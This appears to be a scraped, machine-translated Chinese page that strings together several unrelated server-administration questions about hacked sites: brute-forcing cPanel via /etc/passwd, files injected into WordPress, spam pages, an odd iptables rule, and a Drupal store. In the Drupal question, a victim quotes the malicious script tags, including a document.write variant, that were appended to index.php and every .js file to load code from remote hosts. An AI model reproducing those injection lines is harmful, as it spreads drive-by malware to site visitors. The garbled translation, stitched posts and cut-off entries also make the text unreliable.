最近我在几台服务器上看到了一些问题,其中一个帐户被黑客通过过时的脚本攻击,黑客上传了一个cPanel / FTP Brute强制PHP帐户内的脚本。 PHP文件读取/ etc / passwd来获取用户名,并使用passwd.txt文件来试图暴力破解127.0.0.1:2082。 我试图想办法阻止这一点。 除了“GET /path/phpfile.php”之外,它不会发送任何东西,所以我不能使用mod_security来阻止它。 我一直在想也许更改/ etc / passwd的权限为600,但我不确定这将如何导致我的用户。 我也在考虑限制localhost连接到:2082,但是我担心mod_proxy受到影响。 有什么build议么?
这篇富有洞察力的文章提出,密码不需要非常安全: http : //www.baekdal.com/tips/password-security-usability ? 在这里有一个特定的线,我觉得很麻烦: 实际数量会有所不同,但大多数Web应用程序将无法处理每秒100多个login请求。 大多数Web应用程序是否只需要能够保护每秒100次就可以? 当处理可能受到多个入侵者攻击的分布式系统时,似乎非常低。 编辑更多关于我的问题的解释:根据大多数Web服务器的当前平均性能,在暴力攻击期间可能的最大login尝试次数是多less? 我不是在询问离线密码攻击,有人可以真正发起login尝试。 换个angular度来说,假设你有一个系统不能使用标准或临时帐户禁用的要求(为了防止黑客通过login尝试进入DoS),一个基于Web的系统每秒的实际login尝试次数是非常有用的。
从昨天开始,我的一个网站上发生了一些奇怪的事情。 我在IIS上的wordpress站点的index.php从1 kb更改为80 KB。 map.xml和sitemap.xml在目录中是新的。 在wp-content / themes或wp-content / includes folers中也可以find一些额外的文件。 像b.php或e.asp。 在日志中,我可以find一个条目,显示我认为的过程。 POST /wordpress/wordpress/wp-content/plugins/easyrotator-for-wordpress/b.php – 80或POST /wp-content/themes/koppers12/library/e.asp | 26 | 800a0408 | Invalid_character 80 这可能与我的安全设置可能不那么严格,但我无法弄清楚如何加强安全性,但让wordpress本身,主题和插件更新机制的工作。 目前权利(iusr)被设置为整个网站的读写。 如果我改变它只读,整个更新机制失败,由于较less的权利 有什么办法可以防止不必要的文件在网站上注入,但也能够更新wordpress,主题和插件? 可能使用的注入是某个插件的漏洞利用,还是由于网站注入了不需要的文件的权利? (我已经阻止了引起这个问题的IP地址,但是这并没有什么帮助,因为这个注入方法已经在其他IP地址/范围上看到了。)
我有一个网站,我接pipe了网站pipe理员。 这是在WordPress,被黑客入侵,并有数千个垃圾邮件页面注入到网站。 这些网页被Google编入索引,并最终在search结果中显示“ 此网站可能遭到黑客入侵 ”。 我已经将网站迁移到不同的CMS,并确保它是干净的,将其添加到我的网站pipe理员工具,新的页面已被索引 – 问题是谷歌刚刚添加新的页面到旧的垃圾邮件页面。 该网站很小 – 不超过100页,但在searchsite:example.org我得到“ 约368,000结果 ”。 Google网站站长工具发送消息: Googlebot发现http://example.org/上的URL数量显着增加,返回404(未find)错误。 这可能是停机或configuration错误的迹象,这将是一个糟糕的用户体验。 这将导致Google从search结果中删除这些url。 如果这些URL完全不存在,则不需要执行任何操作。 已经过了一个多月了,但这些数以千计的404错误仍然由Google网站pipe理员工具报告。 我试图search论坛,到目前为止,我唯一的select是从Google的索引中完全删除该网站,然后重新添加它。 我不想要这个停电,因为我们很大程度上依靠searchstream量来查找网站。 关于如何从Google索引中删除这些404个未find的网页的任何想法 – 全部368,000个。
只要看看Debian Lenny盒子上的“iptables -L”的防火墙规则。 一个条目吓我一跳: 接受所有 – 0.0.38.69任何地方 全部接受 – 任何地方0.0.38.69 这不是来自我的任何脚本 – 它可能是什么? 谢谢!
我真的不想知道这件事,因为我想保持它真正的私密性,并尽可能给我的访问者的隐私(不是说我的博客是受欢迎的)。 我刚刚安装了Ubuntu的nginx从数字海洋与Ghost预装,但以前我与Wordpress。 现在(在我写作的这一刻),我不断看到这个日志 POST /bidRequest?exchange=smaato 500 2ms – 19b POST /bidRequest?exchange=smaato 500 1ms – 19b POST /bidRequest?exchange=smaato 500 1ms – 19b POST /bidRequest?exchange=smaato 500 2ms – 19b POST /bidRequest?exchange=smaato 500 1ms – 19b POST /bidRequest?exchange=smaato 500 1ms – 19b POST /bidRequest?exchange=smaato 500 2ms – 19b POST /bidRequest?exchange=smaato 500 3ms – 19b POST /wp-admin/admin-ajax.php 500 2ms […]
当你浏览你的日志时,你使用什么标准来确定它是否是你(即:你需要加强你的服务器)还是他们(即:它们在DoS上接近)? 你认为有多less连接/秒是合理的?为什么? 你是否还有其他的规则(例如:join了同样转介垃圾邮件的IP?)
这是关于基于Drupal 5的在线商店。 突然之间,它不再工作了。 在访问该网站时,出现这个错误: parsing错误:语法错误,第38行的/home/public_html/index.php中出现意外的“<” 在进一步检查后,我发现在index.php结尾处有两行: <script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script> <!–7379ba6e55616ea66ac9d812fc0597ba–> 手动删除这两行后,该网站似乎再次正常工作。 但在更多的问题(编辑页面)被报告后,我发现实际上所有* .js文件都是“感染”的。 他们都在最后包含一个额外的行: document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>'); 这个网站被黑了吗? 在search“blog.nodisposable.com”时,没有什么有趣的事情发生。 该网站本身似乎是合法的。 这可能是黑客自己? 谁能解释这是怎么发生的? 我能做些什么来扭转这种情况? 而我将来可以做些什么来避免这种情况呢? 更新 恢复网站的备份(不是数据库)后,又发生了,但现在脚本标记指向dolfy.sedonahyperbarics.com:8080/XHTML.js 。 显然,很多随机Drupal用户帐户也被创build。 所以这可能是一个实际上是Drupal漏洞的标志。 我们删除了它们,并且仅将用户帐户创build限制到pipe理员(应该从一开始就是这样,我知道:-s)。 我们还将pipe理员用户密码更改为更安全的内容 。 希望现在不会回来。
我的网站www.sagamountain.com最近被一个恶意软件发行商感染了(或者至less我认为它可能是)。 我已经删除了所有的外部内容,谷歌广告,萤火虫聊天等。 我几周前上传了一个备份,当时没有问题。 我修补了SQL注入漏洞。 现在,需要多长时间才能将其标记为危险? 我在哪里可以联系谷歌? 我不知道这是不是正确的地方张贴,但因为它可能是一个服务器问题,我也可以。 网站可以通过病毒在整个服务器上注入base64代码,还是只通过sql注入? 感谢您的帮助,病毒吓跑了我。 有一个在线病毒扫描器,可以扫描我的网页,并告诉我什么是错的?
我刚刚收到以下“未传送的邮件”给我的邮箱[email protected] 这是否意味着有人可能试图(或成功)黑客? (为了隐私的目的,我在下面replace了某些部分,这不是我在这里收到的原来的100%)。 This is the mail system at host mydomain.com. I'm sorry to have to inform you that your message could not be delivered to one or more recipients. It's attached below. For further assistance, please send mail to <postmaster> If you do so, please include this problem report. You can delete your own […]